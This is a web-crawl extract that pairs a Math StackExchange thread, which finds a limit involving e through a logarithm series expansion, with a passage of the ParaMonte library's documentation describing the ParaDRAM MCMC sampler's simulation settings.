\left[ \begin{array}{c} b_1\\ b_2\\ b_3\\ b_4 \end{array} \right]$
2019-02-23 15:58:53
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5141576528549194, "perplexity": 2194.428341303163}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550249504746.91/warc/CC-MAIN-20190223142639-20190223164639-00611.warc.gz"}
https://math.stackexchange.com/questions/849686/find-lim-n-rightarrow-infty-n2-left-left-frac1p-n1-p-n-rightn
# Find $\lim_{n \rightarrow \infty} n^2 \left(\left(\frac{1+p/n}{1-p/n}\right)^{n/2p} - e\right)$ Let $p$ be an arbitrary real number. I wish to compute the following limit $$\lim_{n \rightarrow \infty} n^2 \left(\left(\frac{1+p/n}{1-p/n}\right)^{n/2p} - e\right)$$ I've tried to express $((1+p/n)/(1-p/n))^{n/2p}$ as $(1 + x/k)^k$ for some $x,k$, but I can't seem to be able to do this. Not sure else how to proceed. • Aha. So the trick is to use the above for the numerator, and similarly for the denominator, then apply L'Hopital's rule. The answer should be $ep^2/3$ – user182973 Jun 27 '14 at 21:24 • Yes, although I don't think l'Hopital is even needed: the expression inside the outer parentheses of the original problem just simplifies to $e(\frac{p^2}{3n^2} + O(\frac{p^3}{n^3}))$. – Greg Martin Jun 27 '14 at 22:58 Exactly in the same spirit of Greg Martin's answer, directly use (it will be faster) $$\log \left(\frac{1+x}{1-x}\right)=2 x+\frac{2 x^3}{3}+\frac{2 x^5}{5}+O\left(x^6\right)$$ Replace $x$ by $\frac{p}{n}$ and continue as Greg Martin suggested.
2019-07-20 20:16:21
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9389733076095581, "perplexity": 156.0389715336385}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195526670.1/warc/CC-MAIN-20190720194009-20190720220009-00203.warc.gz"}
https://www.cdslab.org/paramonte/notes/usage/paradram/specifications/
The following variables specify the properties of simulations that are performed via the ParaDRAM routine of ParaMonte library. ParaDRAM stands for Parallel Delayed-Rejection Adaptive Metropolis-Hastings Markov Chain Monte Carlo. ## The simulation specifications of ParaMonte’s ParaDRAM sampler ### description The variable 'description' contains general information about the specific ParaDRAM simulation that is going to be performed. It has no effects on the simulation and serves only as a general description of the simulation for future reference. The ParaDRAM parser automatically recognizes the C-style '\n' escape sequence as the new-line character, and '\\' as the backslash character '\' if they used in the description. For example, '\\n' will be converted to '\n' on the output, while '\n' translates to the new-line character. Other C escape sequences are neither supported nor needed. The default value for description is 'Nothing provided by the user.'. ### inputFileHasPriority A logical (boolean) variable. If TRUE (or .true. or true or .t. from within an input file), then the input specifications of the ParaDRAM simulation will be read from the input file provided by the user, and the simulation specification assignments from within the programming language environment (if any are made) will be completely ignored. If inputFileHasPriority is FALSE, then all simulation specifications of the ParaDRAM sampler that are taken from the user-specified input file will be overwritten by their corresponding input values that are set from within the user's programming environment (if any is provided). Note that this feature is useful when, for example, some simulation specifications have to computed and specified at runtime and therefore, cannot be specified before the program execution. Currently, this functionality (i.e., prioritizing the input file values to input-procedure-argument values) is available only in the Fortran-interface to the ParaDRAM sampler. The default value is FALSE. ### silentModeRequested A logical (boolean) variable. If TRUE (or .true. or true or .t. from within an input file), then the following contents will not be printed in the output report file of the ParaDRAM sampler: - The ParaMonte library interface, compiler, and platform specifications. - The ParaDRAM simulation specification descriptions. Setting this variable to TRUE may break the functionality of the report-file parser methods of the ParaMonte library in high-level languages (e.g., MATLAB, Python, R, ...). The default value is FALSE. ### domainLowerLimitVec domainLowerLimitVec represents the lower boundaries of the cubical domain of the objective function to be sampled. It is an ndim-dimensional vector of 64-bit real numbers, where ndim is the number of variables of the objective function. It is also possible to assign only select values of domainLowerLimitVec and leave the rest of the components to be assigned the default value. This is POSSIBLE ONLY when domainLowerLimitVec is defined inside the input file to the ParaDRAM sampler. For example, having the following inside the input file, domainLowerLimitVec(3:5) = -100 will only set the lower limits of the third, fourth, and the fifth dimensions to -100, or, domainLowerLimitVec(1) = -100, domainLowerLimitVec(2) = -1.e6 will set the lower limit on the first dimension to -100, and 1.e6 on the second dimension, or, domainLowerLimitVec = 3*-2.5e100 will only set the lower limits on the first, second, and the third dimensions to -2.5*10^100, while the rest of the lower limits for the missing dimensions will be automatically set to the default value. The default value for all elements of domainLowerLimitVec is: -1.797693134862316E+307. See also the input simulation specification domainUpperLimitVec. ### domainUpperLimitVec domainUpperLimitVec represents the upper boundaries of the cubical domain of the objective function to be sampled. It is an ndim-dimensional vector of 64-bit real numbers, where ndim is the number of variables of the objective function. It is also possible to assign only select values of domainUpperLimitVec and leave the rest of the components to be assigned the default value. This is POSSIBLE ONLY when domainUpperLimitVec is defined inside the input file to the ParaDRAM sampler. For example, domainUpperLimitVec(3:5) = 100 will only set the upper limits of the third, fourth, and the fifth dimensions to 100, or, domainUpperLimitVec(1) = 100, domainUpperLimitVec(2) = 1.e6 will set the upper limit on the first dimension to 100, and 1.e6 on the second dimension, or, domainUpperLimitVec = 3*2.5e100 will only set the upper limits on the first, second, and the third dimensions to 2.5*10^100, while the rest of the upper limits for the missing dimensions will be automatically set to the default value. The default value for all elements of domainUpperLimitVec is: 1.797693134862316E+307. See also the input simulation specification domainLowerLimitVec. ### variableNameList variableNameList contains the names of the variables to be sampled. It is used to construct the header of the output sample file. Any element of variableNameList that is not set by the user will be automatically assigned a default name. The default value is 'SampleVariablei' where integer 'i' is the index of the variable. ### parallelizationModel parallelizationModel is a string variable that represents the parallelization method to be used in the ParaDRAM sampler. The string value must be enclosed by either single or double quotation marks when provided as input. Two options are currently supported: parallelizationModel = 'multiChain' This method uses the Perfect Parallel scheme in which multiple MCMC chains are generated independently of each other. In this case, multiple output MCMC chain files will also be generated. parallelizationModel = 'singleChain' This method uses the fork-style parallelization scheme. A single MCMC chain file will be generated in this case. At each MCMC step multiple proposal steps will be checked in parallel until one proposal is accepted. Note that in serial mode, there is no parallelism. Therefore, this option does not affect non-parallel simulations and its value is ignored. The serial mode is equivalent to either of the parallelism methods with only one simulation image (processor, core, or thread). The default value is parallelizationModel = 'singleChain'. Note that the input values are case-INsensitive and white-space characters are ignored. See also the input simulation specification mpiFinalizeRequested. ### mpiFinalizeRequested In parallel ParaDRAM simulations via MPI communication libraries, if mpiFinalizeRequested = true (or T, both case-INsensitive), then a call will be made to the MPI_Finalize() routine from within the ParaDRAM sampler at the end of the simulation to finalize the MPI communications. Set this variable to false (or f, both case-INsensitive) if you do not want the ParaDRAM sampler to finalize the MPI communications for you. This is a low-level simulation specification variable, relevant to simulations that directly involve MPI parallelism. If you do not have any MPI-routine calls in your main program, you can safely ignore this variable with its default value. Note that in non-MPI-enabled simulations, such as serial and Coarray-enabled simulations, the value of this variable is completely ignored. The default value is TRUE. See also the input simulation specification parallelizationModel. ### outputFileName outputFileName contains the path and the base of the filename for the ParaDRAM sampler output files. If not provided by the user, the default outputFileName is constructed from the current date and time: ParaDRAM_run_yyyymmdd_hhmmss_mmm where yyyy, mm, dd, hh, mm, ss, mmm stand respectively for the current year, month, day, hour, minute, second, and millisecond. In such a case, the default directory for the output files will be the current working directory of the ParaDRAM sampler. If outputFileName is provided, but ends with a separator character '/' or '\' (as in Linux or Windows OS), then its value will be used as the directory to which the ParaDRAM sampler output files will be written. In this case, the output file naming convention described above will be used. Also, the given directory will be automatically created if it does not exist already. See also the input simulation specification overwriteRequested. ### overwriteRequested A logical (boolean) variable. If true (or .true. or TRUE or .t. from within an input file), then any existing old simulation files with the same name as the current simulation will be overwritten with the new simulation output files. Note that if overwriteRequested is set to TRUE, then the restart functionality is automatically turned off and any existing old simulation output files with the same name as the current simulation will be overwritten by the ParaDRAM sampler. The default value is FALSE. See also the input simulation specification restartFileFormat, outputFileName. ### targetAcceptanceRate targetAcceptanceRate sets an optimal target for the ratio of the number of accepted objective function calls to the total number of function calls by the ParaDRAM sampler. It is a real-valued array of length 2, whose elements determine the upper and lower bounds of the desired acceptance rate. When the acceptance rate of the ParaDRAM sampler is outside the specified limits, the sampler's settings will be automatically adjusted to bring the overall acceptance rate to within the specified limits by the input simulation specification targetAcceptanceRate. When assigned from within a dynamic-language programming environment, such as MATLAB or Python, or from within an input file, targetAcceptanceRate can also be a single real number between 0 and 1. In such case, the ParaDRAM sampler will constantly attempt (with no guarantee of success) to bring the average acceptance ratio of the sampler as close to the user-provided target ratio as possible. The success of the ParaDRAM sampler in keeping the average acceptance ratio close to the requested target value depends heavily on: 1) the value of adaptiveUpdatePeriod; the larger, the easier. 2) the value of adaptiveUpdateCount; the larger, the easier. Note that the acceptance ratio adjustments will only occur every adaptiveUpdatePeriod sampling steps for a total number of adaptiveUpdateCount. There is no default value for targetAcceptanceRate, as the acceptance ratio is not directly adjusted during sampling. See also the input simulation specification scaleFactor. ### sampleSize The variable sampleSize is an integer that dictates the number of (hopefully, independent and identically distributed [i.i.d.]) samples to be drawn from the user-provided objective function. Three ranges of values are possible. If, sampleSize < 0, then, the absolute value of sampleSize dictates the sample size in units of the final effective sample size generated by the sampler. The effective sample is by definition i.i.d., and free from duplicates. The effective sample size is automatically determined by ParaDRAM toward the end of the simulation. For example: sampleSize = -1 yields the effective i.i.d. sample drawn from the objective function. sampleSize = -2 yields a (potentially non-i.i.d.) sample twice as big as the effective sample. sampleSize > 0, then, the specified value will represent the number of points to appear in the final output sample file. If sampleSize turns out to be less than the estimated effective sample size, then the resulting final sample will be i.i.d.. If sampleSize turns out to be larger than the effective sample size, then the resulting sample will be potentially non-i.i.d.. The larger this difference, the more non-i.i.d. the resulting final refined sample will be. For example, sampleSize = 1000 yields a 1000-points final sample from the objective function. sampleSize = 0, in which case, no sample file will be generated. The default value is sampleSize = -1. See also the input simulation specification chainSize, sampleRefinementCount, sampleRefinementMethod. ### randomSeed randomSeed is a scalar 32bit integer that serves as the seed of the random number generator. When it is provided, the seed of the random number generator will be set in a specific deterministic manner to enable future replications of the simulation with the same configuration and input specifications. The default value for randomSeed is an integer vector of processor-dependent size and value that will vary from one simulation to another. However, enough care has been taken to assign unique random seed values to the random number generator on each of the parallel threads (or images, processors, cores, ...) at all circumstances. ### outputColumnWidth The variable outputColumnWidth is a non-negative integer number that determines the width of the data columns in the formatted output files of a ParaDRAM simulation with tabular structure. If it is set to zero, the ParaDRAM sampler will ensure to set the width of each output element to the minimum possible width without losing the requested output precision. In other words, setting outputColumnWidth = 0 will result in the smallest-size for the formatted output files that are in ASCII format. The default value is 0. See also the input simulation specification outputDelimiter, outputRealPrecision, chainFileFormat. ### outputDelimiter outputDelimiter is a string variable, containing a sequence of one or more characters (excluding digits, the period symbol '.', and the addition and subtraction operators: '+' and '-'), that is used to specify the boundary between separate, independent information elements in the tabular output files of the ParaDRAM sampler. The string value must be enclosed by either single or double quotation marks when provided as input. To output in Comma-Separated-Values (CSV) format, set outputDelimiter = ','. If the input value is not provided, the default delimiter ',' will be used when input outputColumnWidth = 0, and a single space character, ',' will be used when input outputColumnWidth > 0. A value of '\t' is interpreted as the TAB character. To avoid this interpretation, use '\\t' to yield '\t' without being interpreted as the TAB character. The default value is ','. See also the input simulation specification outputColumnWidth, outputRealPrecision, chainFileFormat. ### outputRealPrecision The variable outputRealPrecision is a 32-bit integer number that determines the precision - that is, the number of significant digits - of the real numbers in the output files of a ParaDRAM simulation. Any positive integer is acceptable as the input value of outputRealPrecision. However, any digits of the output real numbers beyond the accuracy of 64-bit real numbers (approximately 16 digits of significance) will be meaningless and random. Set this variable to 16 (or larger) if full reproducibility of the simulation is needed in the future. But keep in mind that larger precisions will result in larger-size output files. This variable is ignored for binary output (if any occurs during the simulation). The default value is 8. See also the input simulation specification outputColumnWidth, outputDelimiter, chainFileFormat. ### chainFileFormat chainFileFormat is a string variable that represents the format of the output chain file(s) of a ParaDRAM simulation. The string value must be enclosed by either single or double quotation marks when provided as input. Three values are possible: chainFileFormat = 'compact' This is the ASCII (text) file format which is human-readable but does not preserve the full accuracy of the output values. It is also a significantly slower mode of chain file generation, compared to the binary file format (see below). If the compact format is specified, each of the repeating MCMC states will be condensed into a single entry (row) in the output MCMC chain file. Each entry will be then assigned a sample-weight that is equal to the number of repetitions of that state in the MCMC chain. Thus, each row in the output chain file will represent a unique sample from the objective function. This will lead to a significantly smaller ASCII chain file and faster output size compared to the verbose chain file format (see below). chainFileFormat = 'verbose' This is the ASCII (text) file format which is human-readable but does not preserve the full accuracy of the output values. It is also a significantly slower mode of chain file generation, compared to both compact and binary chain file formats (see above and below). If the verbose format is specified, all MCMC states will have equal sample-weights of 1 in the output chain file. The verbose format can lead to much larger chain file sizes than the compact and binary file formats. This is especially true if the target objective function has a very high-dimensional state space. chainFileFormat = 'binary' This is the binary file format which is not human-readable, but preserves the exact values in the output MCMC chain file. It is also often the fastest mode of chain file generation. If the binary file format is chosen, the chain will be automatically output in the compact format (but as binary) to ensure the production of the smallest-possible output chain file. Binary chain files will have the .bin file extensions. Use the binary format if you need full accuracy representation of the output values while having the smallest-size output chain file in the shortest time possible. The default value is chainFileFormat = 'compact' as it provides a reasonable trade-off between speed and output file size while generating human-readable chain file contents. Note that the input values are case-INsensitive. See also the input simulation specification outputColumnWidth, outputDelimiter, outputRealPrecision. ### restartFileFormat restartFileFormat is a string variable that represents the format of the output restart file(s) which are used to restart an interrupted ParaDRAM simulation. The string value must be enclosed by either single or double quotation marks when provided as input. Two values are possible: restartFileFormat = 'binary' This is the binary file format which is not human-readable, but preserves the exact values of the specification variables required for the simulation restart. This full accuracy representation is required to exactly reproduce an interrupted simulation. The binary format is also normally the fastest mode of restart file generation. Binary restart files will have the .bin file extensions. restartFileFormat = 'ASCII' This is the ASCII (text) file format which is human-readable but does not preserve the full accuracy of the specification variables required for the simulation restart. It is also a significantly slower mode of restart file generation, compared to the binary format. Therefore, its usage should be limited to situations where the user wants to track the dynamics of simulation specifications throughout the simulation time. ASCII restart file(s) will have the .txt file extensions. The default value is restartFileFormat = 'binary'. Note that the input values are case-INsensitive. See also the input simulation specification outputFileName, overwriteRequested. ### progressReportPeriod Every progressReportPeriod calls to the objective function, the sampling progress will be reported to the log file. Note that progressReportPeriod must be a positive integer. The default value is 1000. ### maxNumDomainCheckToWarn maxNumDomainCheckToWarn is an integer number beyond which the user will be warned about the newly-proposed points being excessively proposed outside the domain of the objective function. For every maxNumDomainCheckToWarn consecutively-proposed new points that fall outside the domain of the objective function, the user will be warned until maxNumDomainCheckToWarn = maxNumDomainCheckToStop, in which case the sampler returns a fatal error and the program stops globally. The counter for this warning message is reset after a proposal sample from within the domain of the objective function is obtained. When out-of-domain sampling happens frequently, it is a strong indication of something fundamentally wrong in the simulation. It is, therefore, important to closely inspect and monitor for such frequent out-of-domain samplings. This can be done by setting maxNumDomainCheckToWarn to an appropriate value determined by the user. The default value is 1000. See also the input simulation specification maxNumDomainCheckToStop. ### maxNumDomainCheckToStop maxNumDomainCheckToStop is an integer number beyond which the program will stop globally with a fatal error message declaring that the maximum number of proposal-out-of-domain-bounds has reached. The counter for this global-stop request is reset after a proposal point is accepted as a sample from within the domain of the objective function. When out-of-domain sampling happens frequently, it is a strong indication of something fundamentally wrong in the simulation. It is, therefore, important to closely inspect and monitor for such frequent out-of-domain samplings. This can be done by setting maxNumDomainCheckToStop to an appropriate value determined by the user. The default value is 10000. See also the input simulation specification maxNumDomainCheckToWarn. ### chainSize chainSize determines the number of non-refined, potentially auto-correlated, but unique, samples drawn by the MCMC sampler before stopping ParaDRAM. For example, if you specify chainSize = 10000, then 10000 unique sample points (with no duplicates) will be drawn from the target objective function that the user has provided. The input value for chainSize must be a positive integer of a minimum value ndim + 1 or larger, where ndim is the number of dimensions of the domain of the objective function to be sampled. Note that chainSize is different from and always smaller than the length of the constructed MCMC chain. The default value is 100000. See also the input simulation specification sampleSize. ### randomStartPointDomainLowerLimitVec randomStartPointDomainLowerLimitVec represents the lower boundaries of the cubical domain from which the starting point(s) of the MCMC chain(s) will be initialized randomly (only if requested via the input variable randomStartPointRequested. This happens only when some or all of the elements of the input variable StartPoint are missing. In such cases, every missing value of input StartPoint will be set to the center point between randomStartPointDomainLowerLimitVec and RandomStartPointDomainUpperLimit in the corresponding dimension. If randomStartPointRequested=TRUE (or True, true, t, all case-INsensitive), then the missing elements of StartPoint will be initialized to values drawn randomly from within the corresponding ranges specified by the input variable randomStartPointDomainLowerLimitVec. As an input variable, randomStartPointDomainLowerLimitVec is an ndim-dimensional vector of 64-bit real numbers, where ndim is the number of variables of the objective function. It is also possible to assign only select values of randomStartPointDomainLowerLimitVec and leave the rest of the components to be assigned the default value. This is POSSIBLE ONLY when randomStartPointDomainLowerLimitVec is defined inside the input file to ParaDRAM. For example, having the following inside the input file, randomStartPointDomainLowerLimitVec(3:5) = -100 will only set the lower limits of the third, fourth, and the fifth dimensions to -100, or, randomStartPointDomainLowerLimitVec(1) = -100, randomStartPointDomainLowerLimitVec(2) = -1.e6 will set the lower limit on the first dimension to -100, and 1.e6 on the second dimension, or, randomStartPointDomainLowerLimitVec = 3*-2.5e100 will only set the lower limits on the first, second, and the third dimensions to -2.5*10^100, while the rest of the lower limits for the missing dimensions will be automatically set to the default value. The default values for all elements of randomStartPointDomainLowerLimitVec are taken from the corresponding values in the input variable domainLowerLimitVec. See also the input simulation specification randomStartPointDomainUpperLimitVec, randomStartPointRequested. ### randomStartPointDomainUpperLimitVec randomStartPointDomainUpperLimitVec represents the upper boundaries of the cubical domain from which the starting point(s) of the MCMC chain(s) will be initialized randomly (only if requested via the input variable randomStartPointRequested. This happens only when some or all of the elements of the input variable StartPoint are missing. In such cases, every missing value of input StartPoint will be set to the center point between randomStartPointDomainUpperLimitVec and randomStartPointDomainLowerLimitVec in the corresponding dimension. If randomStartPointRequested=TRUE (or True, true, t, all case-INsensitive), then the missing elements of StartPoint will be initialized to values drawn randomly from within the corresponding ranges specified by the input variable randomStartPointDomainUpperLimitVec. As an input variable, randomStartPointDomainUpperLimitVec is an ndim-dimensional vector of 64-bit real numbers, where ndim is the number of variables of the objective function. It is also possible to assign only select values of randomStartPointDomainUpperLimitVec and leave the rest of the components to be assigned the default value. This is POSSIBLE ONLY when randomStartPointDomainUpperLimitVec is defined inside the input file to ParaDRAM. For example, having the following inside the input file, randomStartPointDomainUpperLimitVec(3:5) = -100 will only set the upper limits of the third, fourth, and the fifth dimensions to -100, or, randomStartPointDomainUpperLimitVec(1) = -100, randomStartPointDomainUpperLimitVec(2) = -1.e6 will set the upper limit on the first dimension to -100, and 1.e6 on the second dimension, or, randomStartPointDomainUpperLimitVec = 3*-2.5e100 will only set the upper limits on the first, second, and the third dimensions to -2.5*10^100, while the rest of the upper limits for the missing dimensions will be automatically set to the default value. The default values for all elements of randomStartPointDomainUpperLimitVec are taken from the corresponding values in the input variable domainUpperLimitVec. See also the input simulation specification randomStartPointDomainLowerLimitVec, randomStartPointRequested. ### startPointVec startPointVec is a 64bit real-valued vector of length ndim (the dimension of the domain of the input objective function). For every element of startPointVec that is not provided as input, the default value will be the center of the domain of startPointVec as specified by domainLowerLimitVec and domainUpperLimitVec input variables. If the input variable randomStartPointRequested=TRUE (or true or t, all case-INsensitive), then the missing elements of startPointVec will be initialized to values drawn randomly from within the corresponding ranges specified by the input variables randomStartPointDomainLowerLimitVec and randomStartPointDomainUpperLimitVec. See also the input simulation specification randomStartPointRequested. ### randomStartPointRequested A logical (boolean) variable. If true (or .true. or TRUE or .t. from within an input file), then the variable startPointVec will be initialized randomly for each MCMC chain that is to be generated by the sampler. The random values will be drawn from the specified or the default domain of startPointVec, given by RandomStartPointDomain variable. Note that the value of startPointVec, if provided, has precedence over random initialization. In other words, for every element of startPointVec that is not provided as input only that element will initialized randomly if randomStartPointRequested=TRUE. Also, note that even if startPointVec is randomly initialized, its random value will be deterministic between different independent runs of ParaDRAM if the input variable randomSeed is provided by the user. The default value is FALSE. See also the input simulation specification startPointVec, randomStartPointDomainLowerLimitVec, randomStartPointDomainUpperLimitVec. ### sampleRefinementCount When sampleSize < 0, the integer variable sampleRefinementCount dictates the maximum number of times the MCMC chain will be refined to remove the autocorrelation within the output MCMC sample. For example, if sampleRefinementCount = 0, no refinement of the output MCMC chain will be performed, the resulting MCMC sample will simply correspond to the full MCMC chain in verbose format (i.e., each sampled state has a weight of one). if sampleRefinementCount = 1, the refinement of the output MCMC chain will be done only once if needed, and no more, even though there may still exist some residual autocorrelation in the output MCMC sample. In practice, only one refinement of the final output MCMC Chain should be enough to remove the existing autocorrelations in the final output sample. Exceptions occur when the Integrated Autocorrelation (IAC) of the output MCMC chain is comparable to or larger than the length of the chain. In such cases, neither the BatchMeans method nor any other method of IAC computation will be able to accurately compute the IAC. Consequently, the samples generated based on the computed IAC values will likely not be i.i.d. and will still be significantly autocorrelated. In such scenarios, more than one refinement of the MCMC chain will be necessary. Very small sample size resulting from multiple refinements of the sample could be a strong indication of the bad mixing of the MCMC chain and the output chain may not contain true i.i.d. samples from the target objective function. if sampleRefinementCount > 1, the refinement of the output MCMC chain will be done for a maximum sampleRefinementCount number of times, even though there may still exist some residual autocorrelation in the final output MCMC sample. if sampleRefinementCount >> 1 (e.g., comparable to or larger than the length of the MCMC chain), the refinement of the output MCMC chain will continue until the integrated autocorrelation of the resulting final sample is less than 2, virtually implying that an independent identically-distributed (i.i.d.) sample has finally been obtained. Note that to obtain i.i.d. samples from a multidimensional chain, ParaDRAM will, by default, use the maximum of Integrated Autocorrelation (IAC) among all dimensions of the chain to refine the chain. Note that the value specified for sampleRefinementCount is used only when the variable sampleSize < 0, otherwise, it will be ignored. The default value is sampleRefinementCount = 1073741823. See also the input simulation specification sampleRefinementMethod. ### sampleRefinementMethod sampleRefinementMethod is a string variable that represents the method of computing the Integrated Autocorrelation Time (IAC) to be used in ParaDRAM for refining the final output MCMC chain and sample. The string value must be enclosed by either single or double quotation marks when provided as input. Options that are currently supported include: sampleRefinementMethod = 'BatchMeans' This method of computing the Integrated Autocorrelation Time is based on the approach described in SCHMEISER, B., 1982, Batch size effects in the analysis of simulation output, Oper. Res. 30 556-568. The batch sizes in the BatchMeans method are chosen to be int(N^(2/3)) where N is the length of the MCMC chain. As long as the batch size is larger than the IAC of the chain and there are significantly more than 10 batches, the BatchMeans method will provide reliable estimates of the IAC. Note that the refinement strategy involves two separate phases of sample decorrelation. At the first stage, the Markov chain is decorrelated recursively (for as long as needed) based on the IAC of its compact format, where only the the uniquely-visited states are kept in the (compact) chain. Once the Markov chain is refined such that its compact format is fully decorrelated, the second phase of the decorrelation begins during which the Markov chain is decorrelated based on the IAC of the chain in its verbose (Markov) format. This process is repeated recursively for as long as there is any residual autocorrelation in the refined sample. sampleRefinementMethod = 'BatchMeans-compact' This is the same as the first case in the above, except that only the first phase of the sample refinement described in the above will be performed, that is, the (verbose) Markov chain is refined only based on the IAC computed from the compact format of the Markov chain. This will lead to a larger final refined sample. However, the final sample will likely not be fully decorrelated. sampleRefinementMethod = 'BatchMeans-verbose' This is the same as the first case in the above, except that only the second phase of the sample refinement described in the above will be performed, that is, the (verbose) Markov chain is refined only based on the IAC computed from the verbose format of the Markov chain. While the resulting refined sample will be fully decorrelated, the size of the refined sample may be smaller than the default choice in the first case in the above. Note that in order to obtain i.i.d. samples from a multidimensional chain, the MCMC sampler will use the average of IAC among all dimensions of the chain to refine the chain. If the maximum, minimum, or the median of IACs is preferred add '-max' (or '-maximum'), '-min' (or '-minimum'), '-med' (or '-median'), respectively, to the value of sampleRefinementMethod. For example, sampleRefinementMethod = 'BatchMeans-max' or, sampleRefinementMethod = 'BatchMeans-compact-max' or, sampleRefinementMethod = 'BatchMeans-max-compact' Also, note that the value specified for sampleRefinementCount is used only when the variable sampleSize < 0, otherwise, it will be ignored. The default value is sampleRefinementMethod = 'BatchMeans'. Note that the input values are case-INsensitive and white-space characters are ignored. See also the input simulation specification sampleRefinementCount. ### scaleFactor scaleFactor is a real-valued positive number (which must be given as string), by the square of which the covariance matrix of the proposal distribution of MCMC sampler is scaled. In other words, the proposal distribution will be scaled in every direction by the value of scaleFactor. It can also be given in units of the string keyword 'gelman' (which is case-INsensitive) after the paper: Gelman, Roberts, and Gilks (1996): 'Efficient Metropolis Jumping Rules'. The paper finds that the optimal scaling factor for a Multivariate Gaussian proposal distribution for the Metropolis-Hastings Markov Chain Monte Carlo sampling of a target Multivariate Normal Distribution of dimension ndim is given by: scaleFactor = 2.38/sqrt(ndim) , in the limit of ndim -> Infinity. Multiples of the gelman scale factors are also acceptable as input and can be specified like the following examples: scaleFactor = '1' multiplies the ndim-dimensional proposal covariance matrix by 1, essentially no change occurs to the covariance matrix. scaleFactor = "1" same as the previous example. The double-quotation marks act the same way as single-quotation marks. scaleFactor = '2.5' multiplies the ndim-dimensional proposal covariance matrix by 2.5. scaleFactor = '2.5*Gelman' multiplies the ndim-dimensional proposal covariance matrix by 2.5 * 2.38/sqrt(ndim). scaleFactor = "2.5 * gelman" same as the previous example, but with double-quotation marks. space characters are ignored. scaleFactor = "2.5 * gelman*gelman*2" equivalent to gelmanFactor-squared multiplied by 5. Note, however, that the result of Gelman et al. paper applies only to multivariate normal proposal distributions, in the limit of infinite dimensions. Therefore, care must be taken when using Gelman's scaling factor with non-Gaussian proposals and target objective functions. Note that only the product symbol (*) can be parsed in the string value of scaleFactor. The presence of other mathematical symbols or multiple appearances of the product symbol will lead to a simulation crash. Also, note that the prescription of an acceptance range specified by the input variable 'targetAcceptanceRate' will lead to the dynamic modification of the initial input value of scaleFactor throughout sampling for adaptiveUpdateCount times. The default scaleFactor string-value is 'gelman' (for all proposals), which is subsequently converted to 2.38/sqrt(ndim). See also the input simulation specification targetAcceptanceRate. ### proposalModel proposalModel is a string variable containing the name of the proposal distribution for the MCMC sampler. The string value must be enclosed by either single or double quotation marks when provided as input. Options that are currently supported include: proposalModel = 'normal' This is equivalent to the multivariate normal distribution, which is the most widely-used proposal model along with MCMC samplers. proposalModel = 'uniform' The proposals will be drawn uniformly from within a ndim-dimensional ellipsoid whose covariance matrix and scale are initialized by the user and optionally adaptively updated throughout the simulation. The default value is 'normal'. See also the input simulation specification proposalStartCovMat, proposalStartCorMat, proposalStartStdVec. ### proposalStartCovMat proposalStartCovMat is a real-valued positive-definite matrix of size (ndim,ndim), where ndim is the dimension of the sampling space. It serves as the best-guess starting covariance matrix of the proposal distribution. To bring the sampling efficiency of ParaDRAM to within the desired requested range, the covariance matrix will be adaptively updated throughout the simulation, according to the user's requested schedule. If proposalStartCovMat is not provided by the user or it is completely missing from the input file, its value will be automatically computed via the input variables proposalStartCorMat and proposalStartStdVec (or via their default values, if not provided). The default value of proposalStartCovMat is an ndim-by-ndim Identity matrix. See also the input simulation specification proposalModel, proposalStartCorMat, proposalStartStdVec. ### proposalStartCorMat proposalStartCorMat is a real-valued positive-definite matrix of size (ndim,ndim), where ndim is the dimension of the sampling space. It serves as the best-guess starting correlation matrix of the proposal distribution used by ParaDRAM. It is used (along with the input vector proposalStartStdVec) to construct the covariance matrix of the proposal distribution when the input covariance matrix is missing in the input list of variables. If the covariance matrix is given as input to ParaDRAM, any input values for proposalStartCorMat, as well as proposalStartStdVec, will be automatically ignored by ParaDRAM. As input to ParaDRAM, the variable proposalStartCorMat along with proposalStartStdVec is especially useful in situations where obtaining the best-guess covariance matrix is not trivial. The default value of proposalStartCorMat is an ndim-by-ndim Identity matrix. See also the input simulation specification proposalModel, proposalStartCovMat, proposalStartStdVec. ### proposalStartStdVec proposalStartStdVec is a real-valued positive vector of length ndim, where ndim is the dimension of the sampling space. It serves as the best-guess starting Standard Deviation of each of the components of the proposal distribution. If the initial covariance matrix (proposalStartCovMat) is missing as an input variable to ParaDRAM, then proposalStartStdVec (along with the input variable proposalStartCorMat) will be used to construct the initial covariance matrix of the proposal distribution of the MCMC sampler. However, if proposalStartCovMat is present as an input argument to ParaDRAM, then the input proposalStartStdVec along with the input proposalStartCorMat will be completely ignored and the input value for proposalStartCovMat will be used to construct the initial covariance matrix of the proposal distribution of ParaDRAM. The default value of proposalStartStdVec is a vector of unit values (i.e., ones) of length ndim. See also the input simulation specification proposalModel, proposalStartCovMat, proposalStartCorMat. ### adaptiveUpdatePeriod Every adaptiveUpdatePeriod calls to the objective function, the parameters of the proposal 